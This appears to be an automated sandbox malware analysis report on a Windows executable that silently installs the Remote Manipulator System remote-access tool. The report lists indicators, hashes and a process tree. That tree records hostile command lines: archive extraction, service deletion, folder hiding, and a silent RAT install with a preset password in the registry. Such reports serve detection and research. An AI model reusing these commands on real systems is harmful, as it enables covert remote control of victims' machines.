Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64 arch:x86 image:win7-20220812-en locale:en-us os:windows7-x64 system -
submitted
27/11/2022, 04:45
Static task
static1
Behavioral task
behavioral1
Sample
cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe
Resource
win7-20220812-en
General
-
Target
cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe
-
Size
3.3MB
-
MD5
3034a42900fbface754e83567cb1e8b8
-
SHA1
6538da3b999db0894615130fd300a4f2c225c108
-
SHA256
cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8
-
SHA512
28bc6dd4d9893afe881b0dd456fb361aa3b151e2f3330432a96cf7ae77c429b6d2ff7a503f62ce71a6e0d247f42aa94b36fd1f8f125548226ed5355a8ca60330
-
SSDEEP
98304:GsTpLAuoFngsWRfajfdJf+S8kvah7iy7cYiwOBpIeWH:GsTp8uoF7fdJmRkyh7iehi1zwH
Malware Config
Signatures
-
Executes dropped EXE 9 IoCs
pid Process
1940 7z.exe
1304 ses.exe
560 rutserv.exe
1284 rutserv.exe
1648 rutserv.exe
1332 rutserv.exe
1584 rfusclient.exe
1512 rfusclient.exe
1776 rfusclient.exe
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process
1724 attrib.exe
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 11 IoCs
pid Process
1608 cmd.exe
1608 cmd.exe
1940 7z.exe
1608 cmd.exe
1608 cmd.exe
1608 cmd.exe
556 cmd.exe
556 cmd.exe
556 cmd.exe
1332 rutserv.exe
1332 rutserv.exe
-
Drops file in Windows directory 43 IoCs
description ioc Process
File created C:\Windows\spom\18699a83-4b57-44b9-bfde-b2b85b872737.tmp cmd.exe
File created C:\Windows\spom\dd_wcf_CA_smci_20220812_140952_266.txt cmd.exe
File created C:\Windows\spom\java_install.log cmd.exe
File created C:\Windows\spom\lpksetup-20220812-142324-0.log cmd.exe
File created C:\Windows\spom\RD3D4D.tmp cmd.exe
File created C:\Windows\spom\3986caf0-bd86-493f-b9e1-ce2b1eb394e4.tmp cmd.exe
File created C:\Windows\spom\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe cmd.exe
File created C:\Windows\spom\chrome_installer.log cmd.exe
File created C:\Windows\spom\FXSAPIDebugLogFile.txt cmd.exe
File created C:\Windows\spom\ASPNETSetup_00001.log cmd.exe
File created C:\Windows\spom\dd_vcredistMSI6466.txt cmd.exe
File created C:\Windows\spom\lpksetup-20220812-142614-0.log cmd.exe
File created C:\Windows\spom\RGID01C.tmp cmd.exe
File created C:\Windows\spom\ses.exe cmd.exe
File created C:\Windows\spom\dd_wcf_CA_smci_20220812_140953_935.txt cmd.exe
File created C:\Windows\spom\JavaDeployReg.log cmd.exe
File created C:\Windows\spom\ose00000.exe cmd.exe
File created C:\Windows\spom\wmsetup.log cmd.exe
File created C:\Windows\spom\dd_SetupUtility.txt cmd.exe
File created C:\Windows\spom\dd_vcredistUI6407.txt cmd.exe
File created C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_140937181-MSI_netfx_Full_x64.msi.txt cmd.exe
File created C:\Windows\spom\rfusclient.exe cmd.exe
File created C:\Windows\spom\RGID01C.tmp-tmp cmd.exe
File created C:\Windows\spom\SetupExe(202208121416244B4).log cmd.exe
File created C:\Windows\spom\rutserv.exe cmd.exe
File created C:\Windows\spom\c205eaa7-5a63-4b1a-b0c0-d53a66d519f7.tmp cmd.exe
File created C:\Windows\spom\d8667315-09fb-47ef-835f-3a194f2a9bbf.tmp cmd.exe
File created C:\Windows\spom\dd_vcredistUI6466.txt cmd.exe
File created C:\Windows\spom\jawshtml.html cmd.exe
File created C:\Windows\spom\jusched.log cmd.exe
File created C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220812_140937181.html cmd.exe
File created C:\Windows\spom\ASPNETSetup_00000.log cmd.exe
File created C:\Windows\spom\e67f403f-a7b8-407a-b1da-a644ca8862ae.tmp cmd.exe
File created C:\Windows\spom\lpksetup-20220812-143535-0.log cmd.exe
File created C:\Windows\spom\java_install_reg.log cmd.exe
File created C:\Windows\spom\lpksetup-20220812-142918-0.log cmd.exe
File created C:\Windows\spom\588e55d7-fe91-4bb6-b0fa-9e8aa46775d9.tmp cmd.exe
File created C:\Windows\spom\85268142-14ac-43d9-82ae-7929db33f992.tmp cmd.exe
File created C:\Windows\spom\Admin.bmp cmd.exe
File created C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt cmd.exe
File created C:\Windows\spom\dd_vcredistMSI6407.txt cmd.exe
File created C:\Windows\spom\f58a5d9e-148a-48de-8220-0cbbefe7cc39.tmp cmd.exe
File created C:\Windows\spom\lpksetup-20220812-143231-0.log cmd.exe
-
Launches sc.exe 2 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process
1288 sc.exe
1960 sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 2 IoCs
pid Process
748 taskkill.exe
532 taskkill.exe
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process
560 rutserv.exe
560 rutserv.exe
560 rutserv.exe
560 rutserv.exe
1284 rutserv.exe
1284 rutserv.exe
1648 rutserv.exe
1648 rutserv.exe
1332 rutserv.exe
1332 rutserv.exe
1332 rutserv.exe
1332 rutserv.exe
1584 rfusclient.exe
-
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process
1776 rfusclient.exe
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process
Token: SeDebugPrivilege 748 taskkill.exe
Token: SeDebugPrivilege 532 taskkill.exe
Token: SeDebugPrivilege 560 rutserv.exe
Token: SeDebugPrivilege 1648 rutserv.exe
Token: SeTakeOwnershipPrivilege 1332 rutserv.exe
Token: SeTcbPrivilege 1332 rutserv.exe
Token: SeTcbPrivilege 1332 rutserv.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target
PID 1752 wrote to memory of 1608 1752 cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe 28
PID 1752 wrote to memory of 1608 1752 cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe 28
PID 1752 wrote to memory of 1608 1752 cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe 28
PID 1752 wrote to memory of 1608 1752 cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe 28
PID 1608 wrote to memory of 1940 1608 cmd.exe 30
PID 1608 wrote to memory of 1940 1608 cmd.exe 30
PID 1608 wrote to memory of 1940 1608 cmd.exe 30
PID 1608 wrote to memory of 1940 1608 cmd.exe 30
PID 1608 wrote to memory of 1304 1608 cmd.exe 31
PID 1608 wrote to memory of 1304 1608 cmd.exe 31
PID 1608 wrote to memory of 1304 1608 cmd.exe 31
PID 1608 wrote to memory of 1304 1608 cmd.exe 31
PID 1304 wrote to memory of 556 1304 ses.exe 32
PID 1304 wrote to memory of 556 1304 ses.exe 32
PID 1304 wrote to memory of 556 1304 ses.exe 32
PID 1304 wrote to memory of 556 1304 ses.exe 32
PID 556 wrote to memory of 748 556 cmd.exe 34
PID 556 wrote to memory of 748 556 cmd.exe 34
PID 556 wrote to memory of 748 556 cmd.exe 34
PID 556 wrote to memory of 748 556 cmd.exe 34
PID 556 wrote to memory of 532 556 cmd.exe 36
PID 556 wrote to memory of 532 556 cmd.exe 36
PID 556 wrote to memory of 532 556 cmd.exe 36
PID 556 wrote to memory of 532 556 cmd.exe 36
PID 556 wrote to memory of 632 556 cmd.exe 37
PID 556 wrote to memory of 632 556 cmd.exe 37
PID 556 wrote to memory of 632 556 cmd.exe 37
PID 556 wrote to memory of 632 556 cmd.exe 37
PID 632 wrote to memory of 328 632 net.exe 38
PID 632 wrote to memory of 328 632 net.exe 38
PID 632 wrote to memory of 328 632 net.exe 38
PID 632 wrote to memory of 328 632 net.exe 38
PID 556 wrote to memory of 1408 556 cmd.exe 39
PID 556 wrote to memory of 1408 556 cmd.exe 39
PID 556 wrote to memory of 1408 556 cmd.exe 39
PID 556 wrote to memory of 1408 556 cmd.exe 39
PID 1408 wrote to memory of 1860 1408 net.exe 40
PID 1408 wrote to memory of 1860 1408 net.exe 40
PID 1408 wrote to memory of 1860 1408 net.exe 40
PID 1408 wrote to memory of 1860 1408 net.exe 40
PID 556 wrote to memory of 1288 556 cmd.exe 41
PID 556 wrote to memory of 1288 556 cmd.exe 41
PID 556 wrote to memory of 1288 556 cmd.exe 41
PID 556 wrote to memory of 1288 556 cmd.exe 41
PID 556 wrote to memory of 1960 556 cmd.exe 42
PID 556 wrote to memory of 1960 556 cmd.exe 42
PID 556 wrote to memory of 1960 556 cmd.exe 42
PID 556 wrote to memory of 1960 556 cmd.exe 42
PID 556 wrote to memory of 1828 556 cmd.exe 43
PID 556 wrote to memory of 1828 556 cmd.exe 43
PID 556 wrote to memory of 1828 556 cmd.exe 43
PID 556 wrote to memory of 1828 556 cmd.exe 43
PID 556 wrote to memory of 1724 556 cmd.exe 44
PID 556 wrote to memory of 1724 556 cmd.exe 44
PID 556 wrote to memory of 1724 556 cmd.exe 44
PID 556 wrote to memory of 1724 556 cmd.exe 44
PID 556 wrote to memory of 560 556 cmd.exe 45
PID 556 wrote to memory of 560 556 cmd.exe 45
PID 556 wrote to memory of 560 556 cmd.exe 45
PID 556 wrote to memory of 560 556 cmd.exe 45
PID 556 wrote to memory of 1284 556 cmd.exe 46
PID 556 wrote to memory of 1284 556 cmd.exe 46
PID 556 wrote to memory of 1284 556 cmd.exe 46
PID 556 wrote to memory of 1284 556 cmd.exe 46
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process
1724 attrib.exe
Processes
-
Level 1: C:\Users\Admin\AppData\Local\Temp\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\cb3a4e1b980e21596c8d39c4f8babc1a225f57e918f1acd750a3e1c713873aa8.exe"
- Suspicious use of WriteProcessMemory
PID: 1752
  Level 2: C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\F529.tmp\new.bat" "
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID: 1608
    Level 3: C:\Users\Admin\AppData\Local\Temp\F529.tmp\7z.exe
    Command line: 7z x -psystem32.dll Sys.7z -oC:\Users\Admin\AppData\Local\Temp -y
    - Executes dropped EXE
    - Loads dropped DLL
    PID: 1940
    Level 3: C:\Users\Admin\AppData\Local\Temp\ses.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\ses.exe" -p
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID: 1304
      Level 4: C:\Windows\SysWOW64\cmd.exe
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FB9E.tmp\15971.bat" -p "
      - Loads dropped DLL
      - Drops file in Windows directory
      - Suspicious use of WriteProcessMemory
      PID: 556
        Level 5: C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im rfusclient.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
        PID: 748
        Level 5: C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im rutserv.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
        PID: 532
        Level 5: C:\Windows\SysWOW64\net.exe
        Command line: net stop netaservice
        - Suspicious use of WriteProcessMemory
        PID: 632
          Level 6: C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop netaservice
          PID: 328
        Level 5: C:\Windows\SysWOW64\net.exe
        Command line: net stop rmanservice
        - Suspicious use of WriteProcessMemory
        PID: 1408
          Level 6: C:\Windows\SysWOW64\net1.exe
          Command line: C:\Windows\system32\net1 stop rmanservice
          PID: 1860
        Level 5: C:\Windows\SysWOW64\sc.exe
        Command line: sc delete netaservice
        - Launches sc.exe
        PID: 1288
        Level 5: C:\Windows\SysWOW64\sc.exe
        Command line: sc delete rmanservice
        - Launches sc.exe
        PID: 1960
        Level 5: C:\Windows\SysWOW64\reg.exe
        Command line: reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
        PID: 1828
        Level 5: C:\Windows\SysWOW64\attrib.exe
        Command line: attrib +s +h "C:\Windows\spom"
        - Sets file to hidden
        - Views/modifies file attributes
        PID: 1724
        Level 5: C:\Users\Admin\AppData\Local\Temp\rutserv.exe
        Command line: "rutserv.exe" /silentinstall
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 560
        Level 5: C:\Users\Admin\AppData\Local\Temp\rutserv.exe
        Command line: "rutserv.exe" /firewall
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        PID: 1284
        Level 5: C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d 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
        PID: 1080
        Level 5: C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d
        PID: 1276
        Level 5: C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 38003900440043004100460043003500460042003900450044004200380041003800370030003400350033003600390033003300350037003700340030003800440031003700410036003500390036003400390033003800460033004100340035003400380036003200370030003100310037004600420036003300390041003700350043004300310039004400360046003400380030003000460030003700320037003900370036004200370030004300420041003800340037003700390034003900300034003600450033003400360034003600350030004300430045004100410045003800390046004100430030003500390037004600390032003400
        PID: 1984
        Level 5: C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d 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
        PID: 1116
        Level 5: C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 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
        PID: 1816
        Level 5: C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Program Files\Remote Manipulator System - Host\rfusclient.exe"
        PID: 276
        Level 5: C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d 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
        PID: 624
        Level 5: C:\Users\Admin\AppData\Local\Temp\rutserv.exe
        Command line: "rutserv.exe" /start
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1648
-
Level 1: C:\Users\Admin\AppData\Local\Temp\rutserv.exe
Command line: C:\Users\Admin\AppData\Local\Temp\rutserv.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 1332
  Level 2: C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID: 1584
    Level 3: C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID: 1776
  Level 2: C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\rfusclient.exe /tray
  - Executes dropped EXE
  PID: 1512
-
Network
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize
893KB
MD5
04ad4b80880b32c94be8d0886482c774
SHA1
344faf61c3eb76f4a2fb6452e83ed16c9cce73e0
SHA256
a1e1d1f0fff4fcccfbdfa313f3bdfea4d3dfe2c2d9174a615bbc39a0a6929338
SHA512
3e3aaf01b769471b18126e443a721c9e9a0269e9f5e48d0a10251bc1ee309855bd71ede266caa6828b007359b21ba562c2a5a3469078760f564fb7bd43acabfb
-
Filesize
160KB
MD5
a51d90f2f9394f5ea0a3acae3bd2b219
SHA1
20fea1314dbed552d5fedee096e2050369172ee1
SHA256
ac9674feb8f2fad20c1e046de67f899419276ae79a60e8cc021a4bf472ae044f
SHA512
c11f981136db7d9bde01046b1953fd924ff29447d41257da09dd762451e27390cea9b69e43206a8fff825ebcd4ddec5a6247bb502aefbd6e8285622caa985bf6
-
Filesize
2.2MB
MD5
be88b8b3ce26e220162b65029b3f0b38
SHA1
468389733444173e91f2ac208d500deed637a241
SHA256
502b5953ebbe874002969c68d581cdb83dcf2fc4e83cc4a6f9637a0b486ed4b5
SHA512
36f268fa91244da34148803896a989d385bb7a0bfafe2908ca326e8f099d69791d5a32fa6b6b8ef0427adf7c128c844b6c79c246df7638e81afb7693f2784dcb
-
Filesize
65B
MD5
13310849fd8d70c608fd7b02fa86eea5
SHA1
9e79bc5cc474fefbe6ec40f8403ba74bb271f393
SHA256
03d09ae50ba37137bb7aa3a3290224a5e91d482b933a839a75797ea5c23e9b42
SHA512
909a92f88da3d2ac6464e2c616976dae2d1ce97d01925473cf3e93a364a4bdc646d9d95412aff95876e614163447420faa68cf3bac33fed6d7220b195e838c30
-
Filesize
10KB
MD5
64736420a3b8c3061f89d2bdac26465c
SHA1
306f8e23b6c979e863cca7f238dd229543e40b35
SHA256
ee83c47bbf15ba057fcd6beb952fb902b38dcab7f7465e6f4f6be533ef2cc119
SHA512
9983348bbbabefe96db162970d1f5bcd7055c9f975abb00d06b3784a586a59229dbd6a9cf97400cba9ce1e56fab219fa5840d0fe7b1d0f3de7784c3b4e574add
-
Filesize
4.8MB
MD5
71abd0cadb18ddcb92a4dc990a29824b
SHA1
d640ecac5ef9db4a642357a5b187c778798a9459
SHA256
e91a657f6a87fb9be6f57c7c4097fdfa23e353a23caeb03c18987e718567b605
SHA512
51c38a9611cb36e60021c7f473893c5d608bce7ee9f482574b4657fb52cc5e1dcc41ef207e5d3a8570d886ca6611c72351d72cb7d7b0f02a606114add7c94a8a
-
Filesize
5.8MB
MD5
9a9cad56988e3c52f154187752ef453e
SHA1
0f9cf3a9cf3d030694179437df7502937cc15cff
SHA256
e5012d6b2bd849ae649114175d012b5ee17992286879be7963446f9e577a8161
SHA512
2dffc1208bb18e18024c21dc03e7edadd12a30b16fe5677583ec7e3203f758de96ff2598ef1a937fea05f6ca746a81c8a74f37fe30e50450e71aa4bfe6e334f0
-
Filesize
46KB
MD5
771c4d6a2b4419d6598ec589a54212f5
SHA1
445f2be41589b527f643b09bf6a86ba88fd00b95
SHA256
942b7cd79bcc4e143ea1314f8439c915b5c04dc0034e89dd4f6204ab54555226
SHA512
f1e113ae1f4d08a11110a271c63acc326810739b7e943e938915f016615543ba920cdb6100418a554c16b71fd204c284fe395b5345fa42f2baf8e7bae11d00e8